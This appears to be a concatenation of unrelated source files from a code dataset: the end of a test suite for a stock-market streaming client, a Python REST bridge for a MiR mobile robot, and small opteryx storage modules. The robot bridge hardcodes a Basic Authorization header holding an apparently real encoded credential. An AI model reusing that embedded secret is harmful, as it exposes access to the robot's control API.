'2': 63082708
}
]
}
],
'3': [
{
'0': 181.95,
'1': 100,
'2': 1,
'3': [
{
'0': 'arcx',
'1': 100,
'2': 63006734
}
]
},
{
'0': 181.98,
'1': 48,
'2': 1,
'3': [
{
'0': 'NSDQ',
'1': 48,
'2': 62327464
}
]
},
{
'0': 182.3,
'1': 100,
'2': 1,
'3': [
{
'0': 'edgx',
'1': 100,
'2': 63192542
}
]
},
{
'0': 186.8,
'1': 700,
'2': 1,
'3': [
{
'0': 'batx',
'1': 700,
'2': 60412822
}
]
}
]
},
{
'key': 'GOOG',
'1': 1590532323728,
'2': [
{
'0': 1418.0,
'1': 1,
'2': 1,
'3': [
{
'0': 'NSDQ',
'1': 1,
'2': 54335011
}
]
},
{
'0': 1417.26,
'1': 100,
'2': 1,
'3': [
{
'0': 'batx',
'1': 100,
'2': 62782324
}
]
},
{
'0': 1417.25,
'1': 100,
'2': 1,
'3': [
{
'0': 'arcx',
'1': 100,
'2': 62767878
}
]
},
{
'0': 1400.88,
'1': 100,
'2': 1,
'3': [
{
'0': 'edgx',
'1': 100,
'2': 54000952
}
]
}
],
'3': [
{
'0': 1421.0,
'1': 300,
'2': 2,
'3': [
{
'0': 'edgx',
'1': 200,
'2': 56723908
},
{
'0': 'arcx',
'1': 100,
'2': 62709059
}
]
},
{
'0': 1421.73,
'1': 10,
'2': 1,
'3': [
{
'0': 'NSDQ',
'1': 10,
'2': 62737731
}
]
}
]
}
]
}
]
}
socket.recv.side_effect = [
json.dumps(self.success_response(1, service, 'SUBS')),
json.dumps(stream_item)]
await subs()
handler, async_handler = register_handler()
await self.client.handle_message()
expected_item = {
'service': service,
'timestamp': 1590532470149,
'command': 'SUBS',
'content': [
{
'key': 'MSFT',
'BOOK_TIME': 1590532442608,
'BIDS': [
{
'BID_PRICE': 181.77,
'TOTAL_VOLUME': 100,
'NUM_BIDS': 1,
'BIDS': [
{
'EXCHANGE': 'edgx',
'BID_VOLUME': 100,
'SEQUENCE': 63150257
}
]
},
{
'BID_PRICE': 181.75,
'TOTAL_VOLUME': 545,
'NUM_BIDS': 2,
'BIDS': [
{
'EXCHANGE': 'NSDQ',
'BID_VOLUME': 345,
'SEQUENCE': 62685730
},
{
'EXCHANGE': 'arcx',
'BID_VOLUME': 200,
'SEQUENCE': 63242588
}
]
},
{
'BID_PRICE': 157.0,
'TOTAL_VOLUME': 100,
'NUM_BIDS': 1,
'BIDS': [
{
'EXCHANGE': 'batx',
'BID_VOLUME': 100,
'SEQUENCE': 63082708
}
]
}
],
'ASKS': [
{
'ASK_PRICE': 181.95,
'TOTAL_VOLUME': 100,
'NUM_ASKS': 1,
'ASKS': [
{
'EXCHANGE': 'arcx',
'ASK_VOLUME': 100,
'SEQUENCE': 63006734
}
]
},
{
'ASK_PRICE': 181.98,
'TOTAL_VOLUME': 48,
'NUM_ASKS': 1,
'ASKS': [
{
'EXCHANGE': 'NSDQ',
'ASK_VOLUME': 48,
'SEQUENCE': 62327464
}
]
},
{
'ASK_PRICE': 182.3,
'TOTAL_VOLUME': 100,
'NUM_ASKS': 1,
'ASKS': [
{
'EXCHANGE': 'edgx',
'ASK_VOLUME': 100,
'SEQUENCE': 63192542
}
]
},
{
'ASK_PRICE': 186.8,
'TOTAL_VOLUME': 700,
'NUM_ASKS': 1,
'ASKS': [
{
'EXCHANGE': 'batx',
'ASK_VOLUME': 700,
'SEQUENCE': 60412822
}
]
}
]
},
{
'key': 'GOOG',
'BOOK_TIME': 1590532323728,
'BIDS': [
{
'BID_PRICE': 1418.0,
'TOTAL_VOLUME': 1,
'NUM_BIDS': 1,
'BIDS': [
{
'EXCHANGE': 'NSDQ',
'BID_VOLUME': 1,
'SEQUENCE': 54335011
}
]
},
{
'BID_PRICE': 1417.26,
'TOTAL_VOLUME': 100,
'NUM_BIDS': 1,
'BIDS': [
{
'EXCHANGE': 'batx',
'BID_VOLUME': 100,
'SEQUENCE': 62782324
}
]
},
{
'BID_PRICE': 1417.25,
'TOTAL_VOLUME': 100,
'NUM_BIDS': 1,
'BIDS': [
{
'EXCHANGE': 'arcx',
'BID_VOLUME': 100,
'SEQUENCE': 62767878
}
]
},
{
'BID_PRICE': 1400.88,
'TOTAL_VOLUME': 100,
'NUM_BIDS': 1,
'BIDS': [
{
'EXCHANGE': 'edgx',
'BID_VOLUME': 100,
'SEQUENCE': 54000952
}
]
}
],
'ASKS': [
{
'ASK_PRICE': 1421.0,
'TOTAL_VOLUME': 300,
'NUM_ASKS': 2,
'ASKS': [
{
'EXCHANGE': 'edgx',
'ASK_VOLUME': 200,
'SEQUENCE': 56723908
},
{
'EXCHANGE': 'arcx',
'ASK_VOLUME': 100,
'SEQUENCE': 62709059
}
]
},
{
'ASK_PRICE': 1421.73,
'TOTAL_VOLUME': 10,
'NUM_ASKS': 1,
'ASKS': [
{
'EXCHANGE': 'NSDQ',
'ASK_VOLUME': 10,
'SEQUENCE': 62737731
}
]
}
]
}
]
}
self.assert_handler_called_once_with(handler, expected_item)
self.assert_handler_called_once_with(async_handler, expected_item)
##########################################################################
# NEWS_HEADLINE
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_news_headline_subs_success(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'NEWS_HEADLINE', 'SUBS'))]
await self.client.news_headline_subs(['GOOG', 'MSFT'])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'NEWS_HEADLINE',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': 'GOOG,MSFT',
'fields': ('0,1,2,3,4,5,6,7,8,9,10')
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_news_headline_subs_failure(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
response = self.success_response(1, 'NEWS_HEADLINE', 'SUBS')
response['response'][0]['content']['code'] = 21
socket.recv.side_effect = [json.dumps(response)]
with self.assertRaises(tda.streaming.UnexpectedResponseCode):
await self.client.news_headline_subs(['GOOG', 'MSFT'])
@no_duplicates
# TODO: Replace this with real messages.
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_news_headline_handler(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
stream_item = {
'data': [{
'service': 'NEWS_HEADLINE',
'timestamp': 1590245129396,
'command': 'SUBS',
'content': [{
'key': 'GOOG',
'delayed': False,
'1': 0,
'2': 1590181199727,
'3': '0S21111333342',
'4': 'Active',
'5': 'Google Does Something',
'6': '0S1113435443',
'7': '1',
'8': 'GOOG',
'9': False,
'10': 'Bloomberg',
}, {
'key': 'MSFT',
'delayed': False,
'1': 0,
'2': 1590181199728,
'3': '0S21111333343',
'4': 'Active',
'5': 'Microsoft Does Something',
'6': '0S1113435444',
'7': '2',
'8': 'MSFT',
'9': False,
'10': 'WSJ',
}]
}]
}
socket.recv.side_effect = [
json.dumps(self.success_response(1, 'NEWS_HEADLINE', 'SUBS')),
json.dumps(stream_item)]
await self.client.news_headline_subs(['GOOG', 'MSFT'])
handler = Mock()
async_handler = asynctest.CoroutineMock()
self.client.add_news_headline_handler(handler)
self.client.add_news_headline_handler(async_handler)
await self.client.handle_message()
expected_item = {
'service': 'NEWS_HEADLINE',
'timestamp': 1590245129396,
'command': 'SUBS',
'content': [{
'key': 'GOOG',
'delayed': False,
'ERROR_CODE': 0,
'STORY_DATETIME': 1590181199727,
'HEADLINE_ID': '0S21111333342',
'STATUS': 'Active',
'HEADLINE': 'Google Does Something',
'STORY_ID': '0S1113435443',
'COUNT_FOR_KEYWORD': '1',
'KEYWORD_ARRAY': 'GOOG',
'IS_HOT': False,
'STORY_SOURCE': 'Bloomberg',
}, {
'key': 'MSFT',
'delayed': False,
'ERROR_CODE': 0,
'STORY_DATETIME': 1590181199728,
'HEADLINE_ID': '0S21111333343',
'STATUS': 'Active',
'HEADLINE': 'Microsoft Does Something',
'STORY_ID': '0S1113435444',
'COUNT_FOR_KEYWORD': '2',
'KEYWORD_ARRAY': 'MSFT',
'IS_HOT': False,
'STORY_SOURCE': 'WSJ',
}]
}
self.assert_handler_called_once_with(handler, expected_item)
self.assert_handler_called_once_with(async_handler, expected_item)
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_news_headline_not_authorized_notification(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
stream_item = {
"notify": [
{
"service": "NEWS_HEADLINE",
"timestamp": 1591500923797,
"content": {
"code": 17,
"msg": "Not authorized for all quotes."
}
}
]
}
socket.recv.side_effect = [
json.dumps(self.success_response(1, 'NEWS_HEADLINE', 'SUBS')),
json.dumps(stream_item)]
await self.client.news_headline_subs(['GOOG', 'MSFT'])
handler = Mock()
async_handler = asynctest.CoroutineMock()
self.client.add_news_headline_handler(handler)
self.client.add_news_headline_handler(async_handler)
await self.client.handle_message()
expected_item = {
"service": "NEWS_HEADLINE",
"timestamp": 1591500923797,
"content": {
"code": 17,
"msg": "Not authorized for all quotes."
}
}
self.assert_handler_called_once_with(handler, expected_item)
self.assert_handler_called_once_with(async_handler, expected_item)
###########################################################################
# Handler edge cases
#
# Note: We use CHART_EQUITY as a test case, which leaks the implementation
# detail that the handler disasynctest.patching is implemented by a common component.
# If this were to ever change, these tests will have to be revisited.
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_messages_received_while_awaiting_response(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
stream_item = self.streaming_entry('CHART_EQUITY', 'SUBS')
socket.recv.side_effect = [
json.dumps(self.success_response(1, 'CHART_EQUITY', 'SUBS')),
json.dumps(stream_item),
json.dumps(self.success_response(2, 'CHART_EQUITY', 'ADD'))]
handler = Mock()
async_handler = asynctest.CoroutineMock()
self.client.add_chart_equity_handler(handler)
self.client.add_chart_equity_handler(async_handler)
await self.client.chart_equity_subs(['GOOG,MSFT'])
await self.client.chart_equity_add(['INTC'])
handler.assert_called_once_with(stream_item['data'][0])
async_handler.assert_called_once_with(stream_item['data'][0])
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_messages_received_while_awaiting_failed_response_bad_code(
self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
stream_item = self.streaming_entry('CHART_EQUITY', 'SUBS')
failed_add_response = self.success_response(2, 'CHART_EQUITY', 'ADD')
failed_add_response['response'][0]['content']['code'] = 21
socket.recv.side_effect = [
json.dumps(self.success_response(1, 'CHART_EQUITY', 'SUBS')),
json.dumps(stream_item),
json.dumps(failed_add_response)]
handler = Mock()
async_handler = asynctest.CoroutineMock()
self.client.add_chart_equity_handler(handler)
self.client.add_chart_equity_handler(async_handler)
await self.client.chart_equity_subs(['GOOG,MSFT'])
with self.assertRaises(tda.streaming.UnexpectedResponseCode):
await self.client.chart_equity_add(['INTC'])
handler.assert_called_once_with(stream_item['data'][0])
async_handler.assert_called_once_with(stream_item['data'][0])
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_messages_received_while_receiving_unexpected_response(
self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
stream_item = self.streaming_entry('CHART_EQUITY', 'SUBS')
failed_add_response = self.success_response(999, 'CHART_EQUITY', 'ADD')
failed_add_response['response'][0]['content']['code'] = 21
socket.recv.side_effect = [
json.dumps(self.success_response(1, 'CHART_EQUITY', 'SUBS')),
json.dumps(stream_item),
json.dumps(failed_add_response)]
handler = Mock()
async_handler = asynctest.CoroutineMock()
self.client.add_chart_equity_handler(handler)
self.client.add_chart_equity_handler(async_handler)
await self.client.chart_equity_subs(['GOOG,MSFT'])
with self.assertRaises(tda.streaming.UnexpectedResponse):
await self.client.chart_equity_add(['INTC'])
handler.assert_called_once_with(stream_item['data'][0])
async_handler.assert_called_once_with(stream_item['data'][0])
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_messages_routing_from_multiple_coroutines(
self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
handler_main = Mock()
async def main_loop(self):
self.client.add_chart_equity_handler(handler_main)
await self.client.chart_equity_subs(['GOOG,MSFT'])
await asyncio.sleep(0.3)
await self.client.handle_message()
handler_success = Mock()
async def success_test(self):
await asyncio.sleep(0.1)
await self.client.account_activity_sub()
handler_success()
handler_failure = Mock()
async def failure_test(self):
await asyncio.sleep(0.2)
try:
await self.client.account_activity_sub()
except tda.streaming.UnexpectedResponseCode:
handler_failure()
stream_item = self.streaming_entry('CHART_EQUITY', 'SUBS')
failed_response = self.success_response(3, 'ACCT_ACTIVITY', 'SUBS')
failed_response['response'][0]['content']['code'] = 21
async def delayedvalue(delay, value):
await asyncio.sleep(delay)
return value
socket.recv.side_effect = [
delayedvalue(0, json.dumps(self.success_response(1, 'CHART_EQUITY', 'SUBS'))),
delayedvalue(0.3, json.dumps(failed_response)),
delayedvalue(0.3, json.dumps(self.success_response(2, 'ACCT_ACTIVITY', 'SUBS'))),
delayedvalue(0, json.dumps(stream_item))]
await asyncio.gather(
main_loop(self),
success_test(self),
failure_test(self))
handler_main.assert_called_once_with(stream_item['data'][0])
handler_success.assert_called_once()
handler_failure.assert_called_once()
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_notify_heartbeat_messages_ignored(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [
json.dumps(self.success_response(1, 'CHART_EQUITY', 'SUBS')),
json.dumps({'notify': [{'heartbeat': '1591499624412'}]})]
await self.client.chart_equity_subs(['GOOG,MSFT'])
handler = Mock()
async_handler = asynctest.CoroutineMock()
self.client.add_chart_equity_handler(handler)
self.client.add_chart_equity_handler(async_handler)
await self.client.handle_message()
handler.assert_not_called()
async_handler.assert_not_called()
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_handle_message_unexpected_response(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [
json.dumps(self.success_response(1, 'CHART_EQUITY', 'SUBS')),
json.dumps(self.success_response(2, 'CHART_EQUITY', 'SUBS'))]
await self.client.chart_equity_subs(['GOOG,MSFT'])
with self.assertRaises(tda.streaming.UnexpectedResponse):
await self.client.handle_message()
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_handle_message_unparsable_message(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [
json.dumps(self.success_response(1, 'CHART_EQUITY', 'SUBS')),
'{"data":[{"service":"LEVELONE_FUTURES", ' +
'"timestamp":1590248118165,"command":"SUBS",' +
'"content":[{"key":"/GOOG","delayed":false,' +
'"1":�,"2":�,"3":�,"6":"?","7":"?","12":�,"13":�,' +
'"14":�,"15":"?","16":"Symbol not found","17":"?",' +
'"18":�,"21":"unavailable","22":"Unknown","24":�,'
'"28":"D,D","33":�}]}]}']
await self.client.chart_equity_subs(['GOOG,MSFT'])
with self.assertRaises(tda.streaming.UnparsableMessage):
await self.client.handle_message()
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_handle_message_multiple_handlers(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
stream_item_1 = self.streaming_entry('CHART_EQUITY', 'SUBS')
socket.recv.side_effect = [
json.dumps(self.success_response(1, 'CHART_EQUITY', 'SUBS')),
json.dumps(stream_item_1)]
await self.client.chart_equity_subs(['GOOG,MSFT'])
handler = Mock()
async_handler = asynctest.CoroutineMock()
self.client.add_chart_equity_handler(handler)
self.client.add_chart_equity_handler(async_handler)
await self.client.handle_message()
handler.assert_called_once_with(stream_item_1['data'][0])
async_handler.assert_called_once_with(stream_item_1['data'][0])
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_multiple_data_per_message(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
stream_item = self.streaming_entry(
'CHART_EQUITY', 'SUBS', [{'msg': 1}])
stream_item['data'].append(self.streaming_entry(
'CHART_EQUITY', 'SUBS', [{'msg': 2}])['data'][0])
socket.recv.side_effect = [
json.dumps(self.success_response(1, 'CHART_EQUITY', 'SUBS')),
json.dumps(stream_item)]
await self.client.chart_equity_subs(['GOOG,MSFT'])
handler = Mock()
async_handler = asynctest.CoroutineMock()
self.client.add_chart_equity_handler(handler)
self.client.add_chart_equity_handler(async_handler)
await self.client.handle_message()
handler.assert_has_calls(
[call(stream_item['data'][0]), call(stream_item['data'][1])])
async_handler.assert_has_calls(
[call(stream_item['data'][0]), call(stream_item['data'][1])])
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_handle_message_without_login(self, ws_connect):
with self.assertRaisesRegex(ValueError, '.*Socket not open.*'):
await self.client.handle_message()
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_subscribe_without_login(self, ws_connect):
with self.assertRaisesRegex(ValueError, '.*Socket not open.*'):
await self.client.chart_equity_subs(['GOOG,MSFT'])
| 39.013734 | 101 | 0.477171 |
933dc085dfb83128fdc163dcc30d8bd4a8446476 | 13,508 | py | Python | strategy/scripts/mir_bridge/mir_bridge.py | andy-Chien/timda_dual_arm | 94170d8889218ea0dc4e6031dcbbf59b7e37e70c | [
"MIT"
] | 3 | 2020-02-17T12:56:22.000Z | 2020-09-30T11:17:03.000Z | strategy/scripts/mir_bridge/mir_bridge.py | andy-Chien/timda_dual_arm | 94170d8889218ea0dc4e6031dcbbf59b7e37e70c | [
"MIT"
] | 2 | 2020-02-17T15:17:43.000Z | 2021-05-11T21:01:26.000Z | strategy/scripts/mir_bridge/mir_bridge.py | andy-Chien/timda_dual_arm | 94170d8889218ea0dc4e6031dcbbf59b7e37e70c | [
"MIT"
] | 9 | 2021-02-01T08:20:53.000Z | 2021-09-17T05:52:35.000Z | #!/usr/bin/python
import re
import json
import requests
import warnings
import math
import time
import base64
import os
from uuid import UUID
MAP_NAME = "HOME_AREA"
## TODO: Try to use function to reconstruct path for decorator's argument 'path'
class Request(object):
def __init__(self, method, path):
self.method = method.upper()
self.path = path
self.h = {
"Content-Type": "application/json;charset=UTF-8",
"Accept-Language": "en-US",
"Authorization": "Basic ZGlzdHJpYnV0b3I6NjJmMmYwZjFlZmYxMGQzMTUyYzk1ZjZmMDU5NjU3NmU0ODJiYjhlNDQ4MDY0MzNmNGNmOTI5NzkyODM0YjAxNA=="
}
def __call__(self, f):
def wrapper(obj, *args, **kwargs):
payload = f(obj, *args, **kwargs)
URL = "{}{}".format(obj.host, self.path)
if payload is not None:
if payload.has_key("PATH"):
URL = "{}{}".format(URL, payload.get("PATH"))
if payload.has_key("BODY"):
payload = payload.get("BODY")
try:
res = requests.request(self.method,
url=URL,
headers=self.h,
data=json.dumps(payload),
timeout=3)
except requests.RequestException as e:
print(e)
return
else:
try:
res = requests.request(self.method,
url=URL,
headers=self.h,
timeout=3)
except requests.RequestException as e:
print(e)
return
return res
return wrapper
class MIR(object):
def __init__(self, host):
if not "http" in host:
warnings.warn("WARRING: Maybe the host name is error.")
self.host = host
def check_response_status_code(self, res):
if str(res.status_code).startswith("20"):
print("[Response OK]")
else:
raise Exception("Response ERROR")
def is_valid_guid(self, guid_to_test, version=1):
try:
guid_obj = UUID(guid_to_test, version=version)
except ValueError:
return False
return str(guid_obj) == guid_to_test
@Request(method="get", path="/status")
def get_status(self):
pass
@Request(method="put", path="/status")
def set_status(self, set_state):
STATE = {"Ready": 3, "Pause": 4}
# Check whether input 'set_state' is correct
if isinstance(set_state, (str, int)):
if isinstance(set_state, str):
s = STATE.get(set_state, 4)
else:
print("ERROR type of set_state")
return
body = {
"state_id": s
}
return body
@Request(method="get", path="/system/info")
def get_system_info(self):
pass
@Request(method="get", path="/missions")
def get_missions(self):
pass
def get_mission_guid(self, mission, auto_create=True):
r = self.get_missions()
rjson = json.loads(r.text)
for l in rjson:
if l.get("name") == mission:
return l.get("guid")
warnings.warn("No this mission")
return None
@Request(method="get", path="/missions")
def get_mission_actions(self, mission):
mission_guid = self.get_mission_guid(mission)
if mission_guid is None:
print("[WARNING] No this mission. Creating mission {}".format(mission))
r = self.create_new_mission(mission)
rjson = json.loads(r.text)
mission_guid = rjson.get("guid")
return {"PATH": "/" + mission_guid + "/actions"}
@Request(method="get", path="/mission_queue")
def get_mission_queue(self):
pass
@Request(method="post", path="/mission_queue")
def post_mission_queue(self, mission):
body = {
"mission_id": mission
}
return body
def add_mission_to_queue(self, mission):
if not self.is_valid_guid(mission):
mission_id = self.get_mission_guid(mission)
r = self.post_mission_queue(mission_id)
self.check_response_status_code(r)
@property
def mission_queue_is_empty(self):
r = self.get_mission_queue()
rjson = json.loads(r.text)
for l in rjson:
if l.get("state").upper() == "PENDING" or \
l.get("state").upper() == "EXECUTING":
return False
return True
@Request(method="delete", path="/mission_queue")
def clear_mission_queue(self):
pass
@Request(method="get", path="/mission_groups")
def get_groups(self):
pass
def get_group_guid(self, group):
r = self.get_groups()
rjson = json.loads(r.text)
for l in rjson:
if l.get("name") == group:
return l.get("guid")
warnings.warn("No this group")
#print(r.text)
return None
@Request(method="get", path="/sessions")
def get_sessions(self):
pass
def get_session_guid(self, session):
r = self.get_sessions()
rjson = json.loads(r.text)
for l in rjson:
if l.get("name") == session:
return l.get("guid")
warnings.warn("No this session")
#print(r.text)
return None
@Request(method="post", path="/missions")
def create_new_mission(self, name, group_id="TKU_IARC", session_id="TKU_IARC"):
print("Creating new mission name: {}, group_id: {}, session_id: {}" \
.format(name, group_id, session_id))
if not self.is_valid_guid(group_id):
group_id = self.get_group_guid(group_id)
if not self.is_valid_guid(session_id):
session_id = self.get_session_guid(session_id)
body = {
"group_id": group_id,
"session_id": session_id,
"name": name
}
return body
@Request(method="delete", path="/missions")
def delete_mission(self, mission):
if not self.is_valid_guid(mission):
mission_id = self.get_mission_guid(mission)
if mission_id is None:
warnings.warn("No this mission to DELETE")
return
return {"PATH": "/" + mission_id}
@Request(method="post", path="/missions")
def add_action_to_mission(self, mission, action_type, parameters, priority, scope_reference=None):
mission_guid = self.get_mission_guid(mission)
if mission_guid is None:
print("[WARNING] No this mission. Creating mission {}".format(mission))
r = self.create_new_mission(mission)
rjson = json.loads(r.text)
mission_guid = rjson.get("guid")
path = "/" + mission_guid + "/actions"
body = {
"action_type": action_type,
"mission_id": mission_guid,
"parameters": parameters,
"priority": priority,
"scope_reference": scope_reference
}
return {"PATH": path, "BODY": body}
def add_try_catch_action(self, priority):
param = [
{ "id": "try", "value": ""},
{ "id": "catch", "value": ""}
]
self.add_action_to_mission("TKU_TMP", "try_catch", param, priority)
def get_scope_reference_guid(self, mission, id):
r = self.get_mission_actions(mission)
rjson = json.loads(r.text)
for l in rjson:
for i in l.get("parameters"):
if i.get("id") == id:
return i.get("guid")
warnings.warn("No scope_reference")
return None
def add_relative_move_action(self, dx=0.0, dy=0.0, dyaw=0.0, \
max_speed_v=0.5, max_speed_w=0.5, \
collision_detection=True, priority=1, \
use_try_catch=True):
scope_reference = None
param = [
{ "id": "x", "value": dx},
{ "id": "y", "value": dy},
{ "id": "orientation", "value": dyaw},
{ "id": "max_linear_speed", "value": max_speed_v},
{ "id": "max_angular_speed", "value": max_speed_w},
{ "id": "collision_detection", "value": collision_detection}
]
if use_try_catch:
self.add_try_catch_action(1)
sound_param = [
{ "id": "sound", "value": "mirconst-guid-0000-0001-sounds000000"},
{ "id": "volume", "value": 80.0},
{ "id": "mode", "value": "custom"},
{ "id": "duration", "value": "00:00:03.000000"}
]
scope_ref_try = self.get_scope_reference_guid("TKU_TMP", "try")
scope_ref_catch = self.get_scope_reference_guid("TKU_TMP", "catch")
self.add_action_to_mission("TKU_TMP", "sound", sound_param, 3, scope_ref_catch)
self.add_action_to_mission("TKU_TMP", "relative_move", param, priority, scope_ref_catch)
self.add_action_to_mission("TKU_TMP", "relative_move", param, priority, scope_ref_try)
else:
self.add_action_to_mission("TKU_TMP", "relative_move", param, priority)
def relative_move(self, dx=0.0, dy=0.0, dyaw=0.0, \
max_speed_v=0.5, max_speed_w=0.5, collision_detection=True):
self.clear_mission_queue()
self.delete_mission("TKU_TMP")
self.add_relative_move_action(dx, dy, dyaw, max_speed_v, max_speed_w, collision_detection, 1)
self.add_mission_to_queue("TKU_TMP")
@Request(method="get", path="/positions")
def get_positions(self):
pass
@Request(method="get", path="/positions")
def get_position_by_id(self, guid):
return {"PATH": "/" + guid}
def get_position_guid(self, position_name):
r = self.get_positions()
self.check_response_status_code(r)
rjson = json.loads(r.text)
for l in rjson:
if l.get("name") == position_name:
return l.get("guid")
print("No this position")
return None
@Request(method="post", path="/positions")
def add_position(self, name, x, y, yaw, position_type=0):
map_guid = self.get_map_guid(MAP_NAME)
body = {
"map_id": map_guid,
"name": name,
"orientation": yaw,
"pos_x": x,
"pos_y": y,
"type_id": position_type
}
return body
@property
def status(self):
r = self.get_status()
self.check_response_status_code(r)
rjson = json.loads(r.text)
d = {
"mir_state": rjson.get("state_text").encode('utf-8'),
"mir_position": {
"x": rjson.get("position").get("x"),
"y": rjson.get("position").get("y"),
"yaw": rjson.get("position").get("orientation")
}
}
return d
## Maybe this function is useless
def arrived_position(self, position_name):
id = self.get_position_guid(position_name)
r = self.get_position_by_id(id)
self.check_response_status_code(r)
rjson = json.loads(r.text)
if rjson.get("name") == position_name:
rs = self.get_status()
rsjson = json.loads(rs.text)
dx = rjson.get("pos_x") - rsjson.get("position").get("x")
dy = rjson.get("pos_y") - rsjson.get("position").get("y")
dyaw = rjson.get("orientation") - rsjson.get("position").get("orientation")
if math.hypot(dx, dy) < 0.1 and abs(dyaw) < 10:
print("Distanse is short enough. {}, {}, {}".format(dx, dy, dyaw))
return True
else:
return False
@Request(method="get", path="/maps")
def get_maps(self):
pass
@Request(method="get", path="/maps")
def get_map(self, map_name):
if not self.is_valid_guid(map_name):
map_guid = self.get_map_guid(map_name)
if map_guid is None:
warnings.warn("No this map: {}".format(map_name))
return
return {"PATH": "/" + map_guid}
def get_map_guid(self, map_name):
r = self.get_maps()
rjson = json.loads(r.text)
for l in rjson:
if l.get("name") == map_name:
return l.get("guid")
print("No this position")
return None
def save_map(self, map_name=MAP_NAME, saved_name=None, \
saved_path=os.path.dirname(os.path.abspath(__file__))+"/maps/"):
if saved_name is None:
t = time.localtime()
timestamp = time.strftime('%b-%d-%Y_%H%M', t)
saved_name = (map_name + "-" + timestamp + ".png")
r = self.get_map(map_name)
rjson = json.loads(r.text)
bMap = rjson.get("map")
print(bMap)
if not os.path.exists(saved_path):
os.mkdir(saved_path)
print("Directory " , saved_path, " Created ")
with open(saved_path + saved_name, "wb") as fh:
fh.write(base64.b64decode(bMap))
print("[INFO] Saved {} map in {}".format(map_name, saved_path))
| 34.284264 | 141 | 0.543826 |
00442a83cd9868d14beb379932132749df0977b3 | 980 | py | Python | pypipe/lib/controls/file.py | AGrigis/pypipe | a77fc2c81cb469535b650c79718f811c5c056238 | [
"CECILL-B"
] | null | null | null | pypipe/lib/controls/file.py | AGrigis/pypipe | a77fc2c81cb469535b650c79718f811c5c056238 | [
"CECILL-B"
] | null | null | null | pypipe/lib/controls/file.py | AGrigis/pypipe | a77fc2c81cb469535b650c79718f811c5c056238 | [
"CECILL-B"
] | null | null | null | ##########################################################################
# PyPipe - Copyright (C) AGrigis, 2017
# Distributed under the terms of the CeCILL-B license, as published by
# the CEA-CNRS-INRIA. Refer to the LICENSE file or to
# http://www.cecill.info/licences/Licence_CeCILL-B_V1-en.html
# for details.
##########################################################################
# System import
import os
# Package import
from .base import Base
class File(Base):
""" Define a file parameter.
"""
def _is_valid(self, value):
""" A method used to check if the value is a file name.
Parameters
----------
value: str (mandatory)
a file name.
Returns
-------
is_valid: bool
return True if the value is a file,
False otherwise.
"""
if isinstance(value, str) and os.path.isfile(value):
return True
else:
return False
| 26.486486 | 74 | 0.496939 |
5caa73d1f26cf37ca475c4d850c4bbad9194da5c | 1,062 | py | Python | opteryx/storage/adapters/local/disk_store.py | mabel-dev/waddles | 959653ac7a66f1035e90085fc036fe7b0a1e57db | [
"Apache-2.0"
] | null | null | null | opteryx/storage/adapters/local/disk_store.py | mabel-dev/waddles | 959653ac7a66f1035e90085fc036fe7b0a1e57db | [
"Apache-2.0"
] | null | null | null | opteryx/storage/adapters/local/disk_store.py | mabel-dev/waddles | 959653ac7a66f1035e90085fc036fe7b0a1e57db | [
"Apache-2.0"
] | null | null | null | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from opteryx.storage import BaseStorageAdapter
class DiskStorage(BaseStorageAdapter):
def __init__(self):
pass
def read_blob(self, blob_name):
import io
with open(blob_name, "rb") as blob:
# wrap in a BytesIO so we can close the file
return io.BytesIO(blob.read())
def get_blob_list(self, partition):
import glob
files = glob.glob(str(partition / "**"), recursive=True)
return [f for f in files if os.path.isfile(f)]
| 32.181818 | 74 | 0.699623 |
